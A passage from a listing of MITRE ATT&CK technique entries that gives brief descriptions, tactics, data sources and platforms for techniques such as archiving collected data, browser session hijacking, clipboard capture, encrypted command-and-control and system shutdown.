Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre